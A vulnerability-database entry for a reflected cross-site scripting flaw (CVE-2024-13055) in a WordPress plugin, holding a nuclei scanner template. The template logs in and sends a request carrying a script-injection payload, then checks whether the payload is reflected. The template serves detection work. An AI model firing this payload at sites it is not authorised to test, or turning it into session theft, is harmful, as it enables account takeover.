Lucene search
K

Dyn Business Panel Plugin <= 1.0.0 - Cross-Site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

Reflected XSS in Dyn Business Panel WordPress plugin <= 1.0.0 due to unsanitized output.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13055
27 Jan 202506:16
circl
CNNVD
WordPress plugin Dyn Business Panel 安全漏洞
27 Jan 202500:00
cnnvd
CVE
CVE-2024-13055
27 Jan 202506:00
cve
Cvelist
CVE-2024-13055 Dyn Business Panel <= 1.0.0 - Reflected XSS
27 Jan 202506:00
cvelist
EUVD
EUVD-2024-51309
3 Oct 202520:07
euvd
NVD
CVE-2024-13055
27 Jan 202506:15
nvd
OSV
CVE-2024-13055
27 Jan 202506:15
osv
Patchstack
WordPress Dyn Business Panel plugin <= 1.0.0 - Reflected XSS vulnerability
27 Jan 202523:27
patchstack
Positive Technologies
PT-2025-1987
27 Jan 202500:00
ptsecurity
RedhatCVE
CVE-2024-13055
23 May 202507:09
redhatcve
Rows per page
id: CVE-2024-13055

info:
  name: Dyn Business Panel Plugin <= 1.0.0 - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: high
  description: |
    Dyn Business Panel WordPress plugin <= 1.0.0 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter in output, letting attackers execute scripts in the context of high privilege users, exploit requires victim to click a malicious link.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed or implement proper sanitization and escaping measures.
  reference:
    - https://wpscan.com/vulnerability/91178272-ed7e-412c-a187-e360a1313004/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13055
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2024-13055
    cwe-id: CWE-79
    epss-score: 0.00522
    epss-percentile: 0.40487
    cpe: cpe:2.3:a:phycticio:dyn_business_panel:1.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: phycticio
    product: dyn_business_panel
  tags: cve,cve2024,dyn-business-panel,wordpress,wp,wp-plugin,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=dbp_clients&edit=$dbp_client_id"></script><script>alert(document.domain)</script><script>&Submit=testxss"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "></script><script>alert(document.domain)</script><script>", "Clientes")
          - contains(content_type, "text/html")
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100d45623a3a5d5ed3e1fecc11da71da3c44f56ba19b163a9271db36d6907121485022100c68348858d14441072abceb5e93076ef72a4465f2fd126cd94aa95af38c5fd46:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2026 16:19Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.1
EPSS0.00522
SSVC
8